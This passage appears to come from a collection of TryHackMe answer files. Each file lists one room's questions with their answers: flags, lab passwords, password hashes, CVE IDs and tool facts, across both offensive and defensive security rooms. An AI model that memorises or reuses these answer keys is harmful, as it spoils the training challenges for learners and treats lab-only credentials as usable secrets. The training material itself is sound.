| 7 | What is the username and password for the login panel? (in the format username:password) 8 | admin:admin 9 | 10 | What is the user.txt flag? 11 | 79007a09481963edf2e1321abd9ae2a0 12 | 13 | What is the final size of the exe payload that you generated? 14 | 73802 15 | 16 | Use the impersonate_token "BUILTIN\Administrators" command to impersonate the Administrators' token. What is the output when you run the getuid command? 17 | NT AUTHORITY\SYSTEM 18 | 19 | Read the root.txt file located at C:\Windows\System32\config 20 | dff0f748678f280250f25a45b8046b4a 21 | -------------------------------------------------------------------------------- /rooms/jurassic park.txt: -------------------------------------------------------------------------------- 1 | Jurassic Park 2 | https://tryhackme.com/room/jurassicpark 3 | 4 | What is the name of the SQL database serving the shop information? 5 | park 6 | 7 | How many columns does the table have? 8 | 5 9 | 10 | What is the system version? 11 | Ubuntu 16.04 12 | 13 | What is Dennis' password? 14 | ih8dinos 15 | 16 | What are the contents of the first flag? 17 | b89f2d69c56b9981ac92dd267f 18 | 19 | What are the contents of the second flag? 20 | 96ccd6b429be8c9a4b501c7a0b117b0a 21 | 22 | What are the contents of the third flag? 23 | b4973bbc9053807856ec815db25fb3f1 24 | 25 | What are the contents of the fifth flag? 26 | 2a7074e491fcacc7eeba97808dc5e2ec 27 | -------------------------------------------------------------------------------- /rooms/tshark.txt: -------------------------------------------------------------------------------- 1 | TShark 2 | https://tryhackme.com/room/tshark 3 | 4 | How many packets are in the dns.cap file? 5 | 38 6 | 7 | How many A records are in the capture? (Including responses) 8 | 6 9 | 10 | Which A record was present the most? 11 | GRIMM.utelsystems.local 12 | 13 | How many packets are in this capture? 14 | 125 15 | 16 | How many DNS queries are in this pcap? (Not responses!) 17 | 56 18 | 19 | What is the DNS transaction ID of the suspicious queries (in hex)? 20 | 0xbeef 21 | 22 | What is the string extracted from the DNS queries? 23 | MZWGCZ33ORUDC427NFZV65BQOVTWQX3XNF2GQMDVG5PXI43IGRZGWIL5 24 | 25 | What is the flag? 26 | flag{th1s_is_t0ugh_with0u7_tsh4rk!} 27 | -------------------------------------------------------------------------------- /rooms/intranet.txt: -------------------------------------------------------------------------------- 1 | Intranet 2 | https://tryhackme.com/room/securesolacodersintra 3 | 4 | What is the first web application flag? 5 | THM{3d60bb5209e4574fc3dc4df418999836} 6 | 7 | What is the second web application flag? 8 | THM{98aa3c0ce224d523e84f2675d63d0971} 9 | 10 | What is the third web application flag? 11 | THM{4ccacfd73710ac18b4ac15646b32380a} 12 | 13 | What is the fourth web application flag? 14 | THM{4f3f2ebe2cec24589d4140e484b0ecd1} 15 | 16 | What is the user.txt flag? 17 | THM{79445fbd3ed0b87ae248fc01a44a06fd} 18 | 19 | What is the user2.txt flag? 20 | THM{5c8f3b3bcbeeecded0f2541daf15a57c} 21 | 22 | What is the root.txt flag? 23 | THM{6cc71ed813c926df497f8c6001131b77} 24 | -------------------------------------------------------------------------------- /rooms/openvas.txt: -------------------------------------------------------------------------------- 1 | OpenVAS 2 | https://tryhackme.com/room/openvas 3 | 4 | When did the scan start in Case 001? 5 | Feb 28, 00:04:46 6 | 7 | When did the scan end in Case 001? 8 | Feb 28, 00:21:02 9 | 10 | How many ports are open in Case 001? 11 | 3 12 | 13 | How many total vulnerabilities were found in Case 001? 14 | 5 15 | 16 | What is the highest severity vulnerability found? (MSxx-xxx) 17 | MS17-010 18 | 19 | What is the first affected OS to this vulnerability? 20 | Microsoft Windows 10 x32/x64 Edition 21 | 22 | What is the recommended vulnerability detection method? 23 | Send the crafted SMB transaction request with fid = 0 and check the response to confirm the vulnerability. 24 | -------------------------------------------------------------------------------- /rooms/cryptography basics.txt: -------------------------------------------------------------------------------- 1 | Cryptography Basics 2 | https://tryhackme.com/room/cryptographybasics 3 | 4 | What is the standard required for handling credit card information? 5 | PCI DSS 6 | 7 | What do you call the encrypted plaintext? 8 | ciphertext 9 | 10 | What do you call the process that returns the plaintext? 11 | decryption 12 | 13 | Knowing that XRPCTCRGNEI was encrypted using Caesar Cipher, what is the original plaintext? 14 | ICANENCRYPT 15 | 16 | Should you trust DES? (Yea/Nay) 17 | Nay 18 | 19 | When was AES adopted as an encryption standard? 20 | 2001 21 | 22 | What’s 1001 ⊕ 1010? 23 | 0011 24 | 25 | What’s 118613842%9091? 26 | 3565 27 | 28 | What’s 60%12? 29 | 0 30 | -------------------------------------------------------------------------------- /rooms/insekube.txt: -------------------------------------------------------------------------------- 1 | Insekube 2 | https://tryhackme.com/room/insekube 3 | 4 | What ports are open? (comma separated) 5 | 22,80 6 | 7 | What is flag 1? 8 | flag{5e7cc6165f6c2058b11710a26691bb6b} 9 | 10 | What is flag 2? 11 | flag{df2a636de15108a4dc41135d930d8ec1} 12 | 13 | What is the version of Grafana running on the machine? 14 | 8.3.0-beta2 15 | 16 | What is the CVE you've found? 17 | CVE-2021-43798 18 | 19 | What is the name of the service account running the Grafana service? 20 | developer 21 | 22 | How many pods are running? 23 | 2 24 | 25 | What is flag 3? 26 | flag{288232b2f03b1ec422c5dae50f14061f} 27 | 28 | What is root.txt? 29 | flag{30180a273e7da821a7fe4af22ffd1701} 30 | -------------------------------------------------------------------------------- /rooms/misp.txt: -------------------------------------------------------------------------------- 1 | MISP 2 | https://tryhackme.com/room/misp 3 | 4 | How many distribution options does MISP provide to share threat information? 5 | 4 6 | 7 | Which user has the role to publish events? 8 | Organisation Admin 9 | 10 | What event ID has been assigned to the PupyRAT event? 11 | 1145 12 | 13 | The event is associated with the adversary gaining ______ into organisations. 14 | Remote Access 15 | 16 | What IP address has been mapped as the PupyRAT C2 Server 17 | 89.107.62.39 18 | 19 | From the Intrusion Set Galaxy, what attack group is known to use this form of attack? 20 | Magic Hound 21 | 22 | There is a taxonomy tag set with a Certainty level of 50. Which one is it? 23 | OSINT 24 | -------------------------------------------------------------------------------- /rooms/sighunt.txt: -------------------------------------------------------------------------------- 1 | SigHunt 2 | https://tryhackme.com/room/sighunt 3 | 4 | What is the Challenge #1 flag? 5 | THM{ph1sh1ng_msht4_101} 6 | 7 | What is the Challenge #2 flag? 8 | THM{n0t_just_4_c3rts} 9 | 10 | What is the Challenge #3 flag? 11 | THM{cl4ss1c_n3tc4t_r3vs} 12 | 13 | What is the Challenge #4 flag? 14 | THM{p0wp0wp0w3rup_3num} 15 | 16 | What is the Challenge #5 flag? 17 | THM{ov3rpr1v1l3g3d_s3rv1c3} 18 | 19 | What is the Challenge #6 flag? 20 | THM{h1d3_m3_1n_run0nc3} 21 | 22 | What is the Challenge #7 flag? 23 | THM{c0ll3ct1ng_7z_ftw} 24 | 25 | What is the Challenge #8 flag? 26 | THM{cUrling_0n_w1nd0ws} 27 | 28 | What is the Challenge #9 flag? 29 | THM{huntm3_pl34s3} 30 | -------------------------------------------------------------------------------- /rooms/boiler ctf.txt: -------------------------------------------------------------------------------- 1 | Boiler CTF 2 | https://tryhackme.com/room/boilerctf2 3 | 4 | File extension after anon login 5 | txt 6 | 7 | What is on the highest port? 8 | ssh 9 | 10 | What's running on port 10000? 11 | webmin 12 | 13 | Can you exploit the service running on that port? (yay/nay answer) 14 | nay 15 | 16 | What's CMS can you access? 17 | joomla 18 | 19 | The interesting file name in the folder? 20 | log.txt 21 | 22 | Where was the other users pass stored(no extension, just the name)? 23 | backup 24 | 25 | user.txt 26 | You made it till here, well done. 27 | 28 | What did you exploit to get the privileged user? 29 | find 30 | 31 | root.txt 32 | It wasn't that hard, was it? 33 | -------------------------------------------------------------------------------- /rooms/brute it.txt: -------------------------------------------------------------------------------- 1 | Brute It 2 | https://tryhackme.com/room/bruteit 3 | 4 | How many ports are open? 5 | 2 6 | 7 | What version of SSH is running? 8 | OpenSSH 7.6p1 9 | 10 | What version of Apache is running? 11 | 2.4.29 12 | 13 | Which Linux distribution is running? 14 | Ubuntu 15 | 16 | What is the hidden directory? 17 | /admin 18 | 19 | What is the user:password of the admin panel? 20 | admin:xavier 21 | 22 | What is John's RSA Private Key passphrase? 23 | rockinroll 24 | 25 | user.txt 26 | THM{a_password_is_not_a_barrier} 27 | 28 | Web flag 29 | THM{brut3_f0rce_is_e4sy} 30 | 31 | What is the root's password? 32 | football 33 | 34 | root.txt 35 | THM{pr1v1l3g3_3sc4l4t10n} 36 | -------------------------------------------------------------------------------- /rooms/tryhack3m bricks heist.txt: -------------------------------------------------------------------------------- 1 | TryHack3M: Bricks Heist 2 | https://tryhackme.com/room/tryhack3mbricksheist 3 | 4 | What is the content of the hidden .txt file in the web folder? 5 | THM{fl46_650c844110baced87e1606453b93f22a} 6 | 7 | What is the name of the suspicious process? 8 | nm-inet-dialog 9 | 10 | What is the service name affiliated with the suspicious process? 11 | ubuntu.service 12 | 13 | What is the log file name of the miner instance? 14 | inet.conf 15 | 16 | What is the wallet address of the miner instance? 17 | bc1qyk79fcp9hd5kreprce89tkh4wrtl8avt4l67qa 18 | 19 | The wallet address used has been involved in transactions between wallets belonging to which threat group? 20 | LockBit 21 | -------------------------------------------------------------------------------- /rooms/profiles.txt: -------------------------------------------------------------------------------- 1 | Profiles 2 | https://tryhackme.com/room/profilesroom 3 | 4 | What is the exposed root password? 5 | Ftrccw45PHyq 6 | 7 | And what time was the users.db file approximately accessed? Format is YYYY-MM-DD HH:MM:SS 8 | 2023-11-07 03:49:45 9 | 10 | What is the MD5 hash of the malicious file found? 11 | 0511ccaad402d6d13ce801e1e9136ba2 12 | 13 | What is the IP address and port of the malicious actor? Format is IP:Port 14 | 10.0.2.72:1337 15 | 16 | What is the full path of the cronjob file and its inode number? Format is filename:inode number 17 | /var/spool/cron/crontabs/root:131127 18 | 19 | What command is found inside the cronjob file? 20 | * * * * * cp /opt/.bashrc /root/.bashrc 21 | -------------------------------------------------------------------------------- /rooms/pwn101.txt: -------------------------------------------------------------------------------- 1 | PWN101 2 | https://tryhackme.com/room/pwn101 3 | 4 | Submit the flag 5 | THM{7h4t's_4n_3zy_oveRflowwwww} 6 | 7 | Submit the flag 8 | THM{y3s_1_n33D_C0ff33_to_C0d3_<3} 9 | 10 | Submit the flag 11 | THM{w3lC0m3_4Dm1N} 12 | 13 | Submit the flag 14 | THM{0h_n0o0o0o_h0w_Y0u_Won??} 15 | 16 | Submit the flag 17 | THM{VerY_b4D_1n73G3rsss} 18 | 19 | Submit the flag 20 | THM{y0U_w0n_th3_Giv3AwaY_anD_th1s_1s_YouR_fl4G} 21 | 22 | Submit the flag 23 | THM{whY_i_us3d_pr1ntF()_w1thoUt_fmting??} 24 | 25 | Submit the flag 26 | THM{7urN3d_puts_in70_win} 27 | 28 | Submit the flag 29 | THM{w417_h0w_Y0u_l3ked_i7_w1th0uT_pr1ntF??} 30 | 31 | Submit the flag 32 | THM{n1c3_us3_0f_g4dg37s} 33 | -------------------------------------------------------------------------------- /rooms/common attacks.txt: -------------------------------------------------------------------------------- 1 | Common Attacks 2 | https://tryhackme.com/room/commonattacks 3 | 4 | What was the original target of Stuxnet? 5 | The Iran Nuclear Programme 6 | 7 | What is the flag? 8 | THM{I_CAUGHT_ALL_THE_PHISH} 9 | 10 | [Research] What currency did the Wannacry attackers request payment in? 11 | Bitcoin 12 | 13 | What is the password? 14 | TryHackMe123! 15 | 16 | Where you have the option, which should you use as a second authentication factor between SMS based TOTPs or Authenticator App based TOTPs (SMS or App)? 17 | App 18 | 19 | What is the minimum number of up-to-date backups you should make? 20 | 3 21 | 22 | Of these, how many (at minimum) should be stored in another location? 23 | 1 24 | -------------------------------------------------------------------------------- /rooms/reversing elf.txt: -------------------------------------------------------------------------------- 1 | Reversing ELF 2 | https://tryhackme.com/room/reverselfiles 3 | 4 | What is the flag? 5 | flag{not_that_kind_of_elf} 6 | 7 | What is the super secret password ? 8 | super_secret_password 9 | 10 | What is the flag ? 11 | flag{if_i_submit_this_flag_then_i_will_get_points} 12 | 13 | What is the flag? 14 | f0r_y0ur_5ec0nd_le55on_unbase64_4ll_7h3_7h1ng5 15 | 16 | What is the password ? 17 | my_m0r3_secur3_pwd 18 | 19 | What is the input ? 20 | OfdlDSA|3tXb32~X3tX@sX`4tXtz 21 | 22 | What is the password ? 23 | 1337_pwd 24 | 25 | What is the flag ? 26 | flag{much_reversing_very_ida_wow} 27 | 28 | What is the flag ? 29 | flag{at_least_this_cafe_wont_leak_your_credit_card_numbers} 30 | -------------------------------------------------------------------------------- /rooms/runtime detection evasion.txt: -------------------------------------------------------------------------------- 1 | Runtime Detection Evasion 2 | https://tryhackme.com/room/runtimedetectionevasion 3 | 4 | What runtime detection measure is shipped natively with Windows? 5 | AMSI 6 | 7 | What response value is assigned to 32768? 8 | AMSI_RESULT_DETECTED 9 | 10 | Will AMSI be instrumented if the file is only on disk? (Y/N) 11 | N 12 | 13 | Enter the flag obtained from the desktop after executing the command in cmd.exe. 14 | THM{p0w3r5h3ll_d0wn6r4d3!} 15 | 16 | Enter the flag obtained from the desktop after executing the command. 17 | THM{r3fl3c7_4ll_7h3_7h1n65} 18 | 19 | Enter the flag obtained from the desktop after executing the command. 20 | THM{p47ch1n6_15n7_ju57_f0r_7h3_600d_6uy5} 21 | 22 | -------------------------------------------------------------------------------- /rooms/hackernote.txt: -------------------------------------------------------------------------------- 1 | hackerNote 2 | https://tryhackme.com/room/hackernote 3 | 4 | Which ports are open? (in numerical order) 5 | 22,80,8080 6 | 7 | What programming language is the backend written in? 8 | go 9 | 10 | How many usernames from the list are valid? 11 | 1 12 | 13 | What are/is the valid username(s)? 14 | james 15 | 16 | How many passwords were in your wordlist? 17 | 180 18 | 19 | What was the user's password? 20 | blue7 21 | 22 | What's the user's SSH password? 23 | dak4ddb37b 24 | 25 | What's the user flag? 26 | thm{56911bd7ba1371a3221478aa5c094d68} 27 | 28 | What is the CVE number for the exploit? 29 | CVE-2019-18634 30 | 31 | What is the root flag? 32 | thm{af55ada6c2445446eb0606b5a2d3a4d2} 33 | -------------------------------------------------------------------------------- /rooms/splunk basics.txt: -------------------------------------------------------------------------------- 1 | Splunk: Basics 2 | https://tryhackme.com/room/splunk101 3 | 4 | Which component is used to collect and send data over the Splunk instance? 5 | Forwarder 6 | 7 | In the Add Data tab, which option is used to collect data from files and ports? 8 | Monitor 9 | 10 | Upload the data attached to this task and create an index "VPN_Logs". How many events are present in the log file? 11 | 2862 12 | 13 | How many log events by the user Maleena are captured? 14 | 60 15 | 16 | What is the name associated with IP 107.14.182.38? 17 | Smith 18 | 19 | What is the number of events that originated from all countries except France? 20 | 2814 21 | 22 | How many VPN Events were observed by the IP 107.3.206.58? 23 | 14 24 | -------------------------------------------------------------------------------- /rooms/windows privesc.txt: -------------------------------------------------------------------------------- 1 | Windows PrivEsc 2 | https://tryhackme.com/room/windows10privesc 3 | 4 | What is the original BINARY_PATH_NAME of the daclsvc service? 5 | C:\Program Files\DACL Service\daclservice.exe 6 | 7 | What is the BINARY_PATH_NAME of the unquotedsvc service? 8 | C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe 9 | 10 | What was the admin password you found in the registry? 11 | password123 12 | 13 | What is the NTLM hash of the admin user? 14 | a9fdfa038c4b75ebc76dc855dd74f0da 15 | 16 | Name one user privilege that allows this exploit to work. 17 | SeImpersonatePrivilege 18 | 19 | Name the other user privilege that allows this exploit to work. 20 | SeAssignPrimaryTokenPrivilege 21 | -------------------------------------------------------------------------------- /rooms/cicada-3301 vol1.txt: -------------------------------------------------------------------------------- 1 | Cicada-3301 Vol:1 2 | https://tryhackme.com/room/cicada3301vol1 3 | 4 | What is the link inside of the audio? 5 | https://pastebin.com/wphPq0Aa 6 | 7 | What is the decrypted passphrase? 8 | Hm5R_4_P455mhp453! 9 | 10 | What is the decrypted key? 11 | Cicada 12 | 13 | What is the final passphrase 14 | Ju5T_4_P455phr453! 15 | 16 | What link is given? 17 | https://imgur.com/a/c0ZSZga 18 | 19 | What tool did you use to find the hidden file 20 | outguess 21 | 22 | What is the Hash type? 23 | SHA512 24 | 25 | What is the Link from the hash? 26 | https://pastebin.com/6FNiVLh5 27 | 28 | What is the link? 29 | https://bit.ly/39pw2NH 30 | 31 | What is the song linked? 32 | The Instar Emergence 33 | -------------------------------------------------------------------------------- /rooms/multi-factor authentication.txt: -------------------------------------------------------------------------------- 1 | Multi-Factor Authentication 2 | https://tryhackme.com/room/multifactorauthentications 3 | 4 | When logging in to the application, you receive an SMS on your phone containing the OTP. What authentication factor is this? 5 | Something you have 6 | 7 | Is MFA an important factor in keeping our online and offline activities safe from threat actors? (yea/nay) 8 | yea 9 | 10 | What can be implemented to help prevent brute-forcing OTPs? 11 | rate limiting 12 | 13 | What is the flag in the dashboard? 14 | 904c8ac84e44f0ba942e9e11ee7037b8 15 | 16 | What is the flag in the dashboard? 17 | 87880e9d27001affdff90989f351c46 18 | 19 | What is the flag in the dashboard? 20 | 20548e076dbb9ba30c9d94ae4aceb38e 21 | -------------------------------------------------------------------------------- /rooms/http request smuggling.txt: -------------------------------------------------------------------------------- 1 | HTTP Request Smuggling 2 | https://tryhackme.com/room/httprequestsmuggling 3 | 4 | What sits in front of one or more web servers and forwards client requests to the appropriate web server? 5 | Reverse Proxy 6 | 7 | What request header indicates the request or response body size in bytes? This informs the receiving server how much data to expect, ensuring the entire content is received. 8 | Content-Length 9 | 10 | What does CL.TE stand for? 11 | Content-Length/Transfer-Encoding 12 | 13 | What does TE.CL stand for? 14 | Transfer-Encoding/Content-Length 15 | 16 | What does TE.TE stand for? 17 | Transfer-Encoding/Transfer-Encoding 18 | 19 | What is the flag in the dashboard? 20 | THM{1c4N_$mU66l3!!} 21 | 22 | -------------------------------------------------------------------------------- /rooms/red team threat intel.txt: -------------------------------------------------------------------------------- 1 | Red Team Threat Intel 2 | https://tryhackme.com/room/redteamthreatintel 3 | 4 | How many Command and Control techniques are employed by Carbanak? 5 | 2 6 | 7 | What signed binary did Carbanak use for defense evasion? 8 | Rundll32 9 | 10 | What Initial Access technique is employed by Carbanak? 11 | Valid Accounts 12 | 13 | Once the chain is complete and you have received the flag, submit it below. 14 | THM{7HR347_1N73L_12 _4w35om3} 15 | 16 | What web shell is APT 41 known to use? 17 | ASPXSpy 18 | 19 | What LOLBAS (Living Off The Land Binaries and Scripts) tool does APT 41 use to aid in file transfers? 20 | certutil 21 | 22 | What tool does APT 41 use to mine and monitor SMS traffic? 23 | MESSAGETAP 24 | -------------------------------------------------------------------------------- /rooms/simple ctf.txt: -------------------------------------------------------------------------------- 1 | Simple CTF 2 | https://tryhackme.com/room/easyctf 3 | 4 | How many services are running under port 1000? 5 | 2 6 | 7 | What is running on the higher port? 8 | ssh 9 | 10 | What's the CVE you're using against the application? 11 | CVE-2019-9053 12 | 13 | To what kind of vulnerability is the application vulnerable? 14 | sqli 15 | 16 | What's the password? 17 | secret 18 | 19 | Where can you login with the details obtained? 20 | ssh 21 | 22 | What's the user flag? 23 | G00d j0b, keep up! 24 | 25 | Is there any other user in the home directory? What's its name? 26 | sunbath 27 | 28 | What can you leverage to spawn a privileged shell? 29 | vim 30 | 31 | What's the root flag? 32 | W3ll d0n3. You made it! 33 | -------------------------------------------------------------------------------- /rooms/buffer overflows.txt: -------------------------------------------------------------------------------- 1 | Buffer Overflows 2 | https://tryhackme.com/room/bof1 3 | 4 | Where is dynamically allocated memory stored? 5 | heap 6 | 7 | Where is information about functions(e.g. local arguments) stored? 8 | stack 9 | 10 | what direction does the stack grown(l for lower/h for higher) 11 | l 12 | 13 | what instruction is used to add data onto the stack? 14 | push 15 | 16 | What register stores the return address? 17 | rax 18 | 19 | What is the minimum number of characters needed to overwrite the variable? 20 | 15 21 | 22 | Use the above method to open a shell and read the contents of the secret.txt file. 23 | omgyoudidthissocool!! 24 | 25 | Use the same method to read the contents of the secret file! 26 | wowanothertime!! 27 | -------------------------------------------------------------------------------- /rooms/cyber scotland 2021.txt: -------------------------------------------------------------------------------- 1 | Cyber Scotland 2021 2 | https://tryhackme.com/room/cyberweek2021 3 | 4 | Terminal is a powerful tool that you can use to give instructions to the AttackBox computer and can be used to run applications. To find out the name of the account you're using type whoami into the terminal and press the ENTER key on your keyboard. Write out the response in the answer field below. 5 | root 6 | 7 | Question; What is the first option under the 'Penetration Testing (Fast Track)' menu? 8 | Microsoft SQL Bruter 9 | 10 | Switch to the "Contact" page. What is the phone number given for the company? 11 | 08081 570087 12 | 13 | What is Theo's password? 14 | Inverkeithing 15 | 16 | What is this flag? 17 | SBRC{ODhiOTQ3ZTk0NzJhMWI1NTE5MGUyY2Vj} 18 | -------------------------------------------------------------------------------- /rooms/writing pentest reports.txt: -------------------------------------------------------------------------------- 1 | Writing Pentest Reports 2 | https://tryhackme.com/room/writingpentestreports 3 | 4 | Which stakeholder should 80% of your report be aimed towards? 5 | Technical 6 | 7 | Which section of the report is for extra information that can sometimes help security stakeholders better understand what coverage was achieved and the next steps that should be followed? 8 | Appendices 9 | 10 | What is the value of the flag? 11 | THM{Summarise.the.Business.Information} 12 | 13 | What is the flag? 14 | THM{Race.Condition.Writeup.Goes.Vroom} 15 | 16 | Which appendix will be vital for the blue team to discern if activity is from a pentest or an actual attack? 17 | Assessment Artefacts 18 | 19 | What is the value of the flag? 20 | THM{QA.Makes.Reports.Better} 21 | -------------------------------------------------------------------------------- /rooms/burp suite repeater.txt: -------------------------------------------------------------------------------- 1 | Burp Suite: Repeater 2 | https://tryhackme.com/room/burpsuiterepeater 3 | 4 | Which sections gives us a more intuitive control over our requests? 5 | Inspector 6 | 7 | Which view will populate when sending a request from the Proxy module to Repeater? 8 | Request 9 | 10 | Which option allows us to visualize the page as it would appear in a web browser? 11 | Render 12 | 13 | Which section in Inspector is specific to POST requests? 14 | Body Parameters 15 | 16 | What is the flag you receive? 17 | THM{Yzg2MWI2ZDhlYzdlNGFiZTUzZTIzMzVi} 18 | 19 | What is the flag you receive when you cause a 500 error in the endpoint? 20 | THM{N2MzMzFhMTA1MmZiYjA2YWQ4M2ZmMzhl} 21 | 22 | What is the flag? 23 | THM{ZGE3OTUyZGMyMzkwNjJmZjg3Mzk1NjJh} 24 | -------------------------------------------------------------------------------- /rooms/ad basic enumeration.txt: -------------------------------------------------------------------------------- 1 | AD: Basic Enumeration 2 | https://tryhackme.com/room/adbasicenumeration 3 | 4 | What is the domain name of our target? 5 | tryhackme.loc 6 | 7 | What version of Windows Server is running on the DC? 8 | Windows Server 2019 Datacenter 9 | 10 | What is the flag hidden in one of the shares? 11 | THM{88_SMB_88} 12 | 13 | What group is the user rduke part of? 14 | Domain Users 15 | 16 | What is this user's full name? 17 | Raoul Duke 18 | 19 | Which username is associated with RID 1634? 20 | katie.thomas 21 | 22 | What is the minimum password length? 23 | 7 24 | 25 | What is the locked account duration? 26 | 2 minutes 27 | 28 | Perform password spraying using CrackMapExec. What valid credentials did you find? (format: username:password) 29 | rduke:Password1! 30 | -------------------------------------------------------------------------------- /rooms/aws iam enumeration.txt: -------------------------------------------------------------------------------- 1 | AWS IAM Enumeration 2 | https://tryhackme.com/room/awsiamenumeration 3 | 4 | Can you get information about an AWS account, including its IAM principals - without authenticating? 5 | yes 6 | 7 | If an IAM Principal does not exist, what does an attempt to update the resource-based policy to include the "Principal" return? 8 | error message 9 | 10 | What is John's username? 11 | john.cervantes 12 | 13 | What is Adam's last name? 14 | foreman 15 | 16 | What type of S3 policy allows you to enumerate root user email addresses? 17 | ACL 18 | 19 | How many roles does Quiet Riot identify in your account when you run the Service Footprinting option? 20 | 5 21 | 22 | What services appear enabled based on the results? 23 | guardduty,organizations,support,trustedadvisor 24 | -------------------------------------------------------------------------------- /rooms/length extension attacks.txt: -------------------------------------------------------------------------------- 1 | Length Extension Attacks 2 | https://tryhackme.com/room/lengthextensionattacks 3 | 4 | What property prevents an attacker from reversing a hash to get the original input? 5 | Pre-image Resistance 6 | 7 | What property ensures that no two different messages produce the same hash? 8 | Collision Resistance 9 | 10 | What block size does SHA-256 use? 11 | 512 12 | 13 | What function ensures data is aligned to fit block size requirements? 14 | Padding 15 | 16 | How many words does SHA-256’s internal state have? 17 | 8 18 | 19 | What hashing method prevents length extension attacks by using a secret key? 20 | HMAC 21 | 22 | What is the flag in the image? 23 | THM{L3n6th_3Xt33ns10nssss} 24 | 25 | What is the flag? 26 | THM{l3n6th_2_4dM1n} 27 | -------------------------------------------------------------------------------- /rooms/ultratech.txt: -------------------------------------------------------------------------------- 1 | UltraTech 2 | https://tryhackme.com/room/ultratech1 3 | 4 | Which software is using the port 8081? 5 | Node.js 6 | 7 | Which other non-standard port is used? 8 | 31331 9 | 10 | Which software using this port? 11 | Apache 12 | 13 | Which GNU/Linux distribution seems to be used? 14 | Ubuntu 15 | 16 | The software using the port 8081 is a REST api, how many of its routes are used by the web application? 17 | 2 18 | 19 | There is a database lying around, what is its filename? 20 | utech.db.sqlite 21 | 22 | What is the first user's password hash? 23 | f357a0c52799563c7c7b76c1e7543a32 24 | 25 | What is the password associated with this hash? 26 | n100906 27 | 28 | What are the first 9 characters of the root user's private SSH key? 29 | MIIEogIBA 30 | -------------------------------------------------------------------------------- /rooms/bolt.txt: -------------------------------------------------------------------------------- 1 | Bolt 2 | https://tryhackme.com/room/bolt 3 | 4 | What port number has a web server with a CMS running? 5 | 8000 6 | 7 | What is the username we can find in the CMS? 8 | bolt 9 | 10 | What is the password we can find for the username? 11 | boltadmin123 12 | 13 | What version of the CMS is installed on the server? (Ex: Name 1.1.1) 14 | Bolt 3.7.1 15 | 16 | There's an exploit for a previous version of this CMS, which allows authenticated RCE. Find it on Exploit DB. What's its EDB-ID? 17 | 48296 18 | 19 | Metasploit recently added an exploit module for this vulnerability. What's the full path for this exploit? (Ex: exploit/....) 20 | exploit/unix/webapp/bolt_authenticated_rce 21 | 22 | Look for flag.txt inside the machine. 23 | THM{wh0_d035nt_l0ve5_b0l7_r1gh7?} 24 | -------------------------------------------------------------------------------- /rooms/container vulnerabilities.txt: -------------------------------------------------------------------------------- 1 | Container Vulnerabilities 2 | https://tryhackme.com/room/containervulnerabilitiesDG 3 | 4 | Perform the exploit in this task on the target machine. What is the value of the flag that has now been added to the container? 5 | THM{MOUNT_MADNESS} 6 | 7 | Name the directory path which contains the docker.sock file on the container. 8 | /var/run 9 | 10 | Perform the exploit in this task on the target machine. What is the value of the flag located at /root/flag.txt on the host operating system? 11 | THM{NEVER-ENOUGH-SOCKS} 12 | 13 | What port number, by default, does the Docker Engine use? 14 | 2375 15 | 16 | Perform the exploit in this task on the target machine. What is the flag located in /home/tryhackme/flag.txt? 17 | THM{YOUR-SPACE-MY-SPACE} 18 | 19 | -------------------------------------------------------------------------------- /rooms/agent sudo.txt: -------------------------------------------------------------------------------- 1 | Agent Sudo 2 | https://tryhackme.com/room/agentsudoctf 3 | 4 | How many open ports? 5 | 3 6 | 7 | How you redirect yourself to a secret page? 8 | user-agent 9 | 10 | What is the agent name? 11 | chris 12 | 13 | FTP password 14 | crystal 15 | 16 | Zip file password 17 | alien 18 | 19 | steg password 20 | Area51 21 | 22 | Who is the other agent (in full name)? 23 | james 24 | 25 | SSH password 26 | hackerrules! 27 | 28 | What is the user flag? 29 | b03d975e8c92a7c04146cfa7a5a313c7 30 | 31 | What is the incident of the photo called? 32 | Roswell alien autopsy 33 | 34 | CVE number for the escalation 35 | CVE-2019-14287 36 | 37 | What is the root flag? 38 | b53a02f55b57d4439e3341834d70c062 39 | 40 | (Bonus) Who is Agent R? 41 | DesKel 42 | -------------------------------------------------------------------------------- /rooms/post-exploitation basics.txt: -------------------------------------------------------------------------------- 1 | Post-Exploitation Basics 2 | https://tryhackme.com/room/postexploit 3 | 4 | What is the shared folder that is not set by default? 5 | Share 6 | 7 | What operating system is running inside of the network besides Windows Server 2019? 8 | Windows 10 Enterprise Evaluation 9 | 10 | I've hidden a flag inside of the users find it 11 | POST{P0W3RV13W_FTW} 12 | 13 | What service is also a domain admin 14 | SQLSERVICE 15 | 16 | What two users are Kerberoastable? 17 | SQLSERVICE, KRBTGT 18 | 19 | What is the Machine1 Password? 20 | Password1 21 | 22 | What is the Machine2 Hash? 23 | c39f2beb3d2ec06a62cb887fb391dee0 24 | 25 | What tool allows to view the event logs? 26 | Event Viewer 27 | 28 | What is the SQL Service password 29 | MYpassword123# 30 | -------------------------------------------------------------------------------- /rooms/web application security.txt: -------------------------------------------------------------------------------- 1 | Web Application Security 2 | https://tryhackme.com/room/introwebapplicationsecurity 3 | 4 | What do you need to access a web application? 5 | Browser 6 | 7 | You discovered that the login page allows an unlimited number of login attempts without trying to slow down the user or lock the account. What is the category of this security risk? 8 | Identification and Authentication Failure 9 | 10 | You noticed that the username and password are sent in cleartext without encryption. What is the category of this security risk? 11 | Cryptographic Failures 12 | 13 | Check the other users to discover which user account was used to make the malicious changes and revert them. After reverting the changes, what is the flag that you have received? 14 | THM{IDOR_EXPLORED} 15 | -------------------------------------------------------------------------------- /rooms/thehive project.txt: -------------------------------------------------------------------------------- 1 | TheHive Project 2 | https://tryhackme.com/room/thehiveproject 3 | 4 | Which open-source platform supports the analysis of observables within TheHive? 5 | Cortex 6 | 7 | Which pre-configured account cannot manage any cases? 8 | Admin 9 | 10 | Which permission allows a user to create, update or delete observables? 11 | manageObservable 12 | 13 | Which permission allows a user to execute actions? 14 | manageAction 15 | 16 | Where are the TTPs imported from? 17 | MITRE ATT&CK 18 | 19 | According to the Framework, what type of Detection "Data source" would our investigation be classified under? 20 | Network Traffic 21 | 22 | Upload the pcap file as an observable. What is the flag obtained from https://MACHINE_IP//files/flag.html 23 | THM{FILES_ARE_OBSERVABLES} 24 | -------------------------------------------------------------------------------- /rooms/intro to detection engineering.txt: -------------------------------------------------------------------------------- 1 | Intro to Detection Engineering 2 | https://tryhackme.com/room/introtodetectionengineering 3 | 4 | Which detection type focuses on misalignments within the current infrastructure? 5 | Configuration 6 | 7 | Which detection approach involves building an asset or activity baseline profile for detection? 8 | Modelling 9 | 10 | Which type of detection integrates with defensive playbooks? 11 | Threat Behaviour 12 | 13 